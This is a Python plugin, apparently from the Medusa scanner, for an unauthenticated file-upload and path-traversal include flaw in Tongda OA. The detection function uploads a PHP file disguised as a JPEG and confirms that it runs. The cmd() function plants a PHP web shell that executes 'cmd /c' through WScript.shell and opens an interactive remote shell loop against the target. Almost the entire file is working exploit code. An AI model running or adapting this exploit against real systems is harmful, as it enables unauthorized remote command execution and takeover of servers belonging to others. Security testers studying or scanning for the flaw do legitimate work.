#!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = 'Ascotbe'
from ClassCongregation import VulnerabilityDetails,ErrorLog,WriteFile,randoms,ErrorHandling
import requests
import urllib3
import re
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
class VulnerabilityInfo(object):
    def __init__(self,Medusa):
        self.info = {}
        self.info['number']="0" #如果没有CVE或者CNVD编号就填0，CVE编号优先级大于CNVD
        self.info['author'] = "Ascotbe"  # 插件作者
        self.info['create_date'] = "2020-3-19"  # 插件编辑时间
        self.info['disclosure'] = '2020-3-17'  # 漏洞披露时间，如果不知道就写编写插件的时间
        self.info['algroup'] = "TongdaOfficeAnywhereArbitraryFileUpload&RemoteCommandExecutionVulnerability"  # 插件名称
        self.info['name'] ='通达OA任意文件上传&远程命令执行漏洞' #漏洞名称
        self.info['affects'] = "通达OA"  # 漏洞组件
        self.info['desc_content'] = "通达OA中出现了ispirit/im/upload.php这个路径，是未授权的文件上传。"  # 漏洞描述
        self.info['rank'] = "高危"  # 漏洞等级
        self.info['version'] = "V11版\r\n2017版\r\n2016版\r\n2015版\r\n2013增强版\r\n2013版"  # 这边填漏洞影响的版本
        self.info['suggest'] = "升级通达OA最新版本"  # 修复建议
        self.info['details'] = Medusa  # 结果


def medusa(**kwargs)->None:
    url = kwargs.get("Url")  # 获取传入的url参数
    Headers = kwargs.get("Headers")  # 获取传入的头文件
    proxies = kwargs.get("Proxies")  # 获取传入的代理参数
    try:
        upload_url = url + '/ispirit/im/upload.php'
        rm = randoms().result(50)
        rm_file=randoms().result(10)
        Headers1=Headers

        Headers1["Accept"]="text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
        Headers1["X-Forwarded-For"]= "127.0.0.1"
        Headers1["Connection"]="close"
        Headers1["Upgrade-Insecure-Requests"]="1"
        Headers1["Content-Type"]="multipart/form-data; boundary=---------------------------27723940316706158781839860668"

        file_data = "-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"ATTACHMENT\"; filename=\"%s.jpg\"\r\nContent-Type: image/jpeg\r\n\r\n<?php\r\necho \"%s\"\r\n?>\n\r\n-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"P\"\r\n\r\n1\r\n-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"DEST_UID\"\r\n\r\n1222222\r\n-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"UPLOAD_MODE\"\r\n\r\n1\r\n-----------------------------27723940316706158781839860668--\r\n" % (rm_file,rm)
        upload_resp = requests.post(upload_url, headers=Headers1,proxies=proxies, data=file_data)
        name = "".join(re.findall("2003_(.+?)\|", upload_resp.text))
        get_shell_url = url + '/ispirit/interface/gateway.php'
        Headers2=Headers
        Headers2 ["Accept"]="text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
        Headers2["X-Forwarded-For"]="127.0.0.1"
        Headers2["Connection"]="close"
        Headers2["Upgrade-Insecure-Requests"]="1"
        Headers2["Content-Type"]="application/x-www-form-urlencoded"
        data = {"json": "{\"url\":\"../../../general/../attach/im/2003/%s.%s.jpg\"}" % (name,rm_file)}
        get_shell_resp = requests.post(get_shell_url, headers=Headers2,proxies=proxies, data=data)
        con=get_shell_resp.text
        code=get_shell_resp.status_code
        if code == 200 and con.find(rm)!=-1:
            Medusa = "{}存在通达OA任意文件上传&远程命令执行漏洞\r\n验证数据:\r\n漏洞位置:{}\r\nPOST数据包:{}\r\n上传文件内容:{}\r\n返回随机数:{}\r\n如需执行命令请在脚本中修改函数".format(url,get_shell_url,data,file_data,con)
            #如果需要使用命令执行把下面这行注释打开即可
            #command(scheme + "://" + url + ":" + str(port))
            _t = VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, get_shell_resp,**kwargs).Write()  # 传入url和扫描到的数据
            WriteFile().result(str(url),str(Medusa))#写入文件，url为目标文件名统一传入，Medusa为结果
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        _l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类



def cmd(url, RandomAgent,proxies=None,**kwargs):
    cmd_rm=randoms().result(10)
    url1 = url + '/ispirit/im/upload.php'
    headers = {
        "User-Agent": RandomAgent,
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate",
        "X-Forwarded-For": "127.0.0.1", "Connection": "close", "Upgrade-Insecure-Requests": "1",
        "Content-Type": "multipart/form-data; boundary=---------------------------27723940316706158781839860668"}
    data = "-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"ATTACHMENT\"; filename=\"%s.jpg\"\r\nContent-Type: image/jpeg\r\n\r\n<?php\r\n$command=$_POST['%s'];\r\n$wsh = new COM('WScript.shell');\r\n$exec = $wsh->exec(\"cmd /c \".$command);\r\n$stdout = $exec->StdOut();\r\n$stroutput = $stdout->ReadAll();\r\necho $stroutput;\r\n?>\n\r\n-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"P\"\r\n\r\n1\r\n-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"DEST_UID\"\r\n\r\n1222222\r\n-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"UPLOAD_MODE\"\r\n\r\n1\r\n-----------------------------27723940316706158781839860668--\r\n"%(cmd_rm,cmd_rm)
    result = requests.post(url1, headers=headers, data=data,proxies=proxies,)
    name = "".join(re.findall("2003_(.+?)\|", result.text))
    url2 = url + '/ispirit/interface/gateway.php'
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate",
        "X-Forwarded-For": "127.0.0.1", "Connection": "close", "Upgrade-Insecure-Requests": "1",
        "Content-Type": "application/x-www-form-urlencoded"}

    while(1):
        command = input("fuhei@shell$ ")
        if command == 'exit' or command  == 'quit':
            break
        else:
            data = {"json": "{\"url\":\"../../../general/../attach/im/2003/%s.%s.jpg\"}" % (name,cmd_rm), "%s"%cmd_rm: "%s" %command}
            result = requests.post(url2, headers=headers, data=data,proxies={'http':'127.0.0.1:8080'})
            print(result.text)




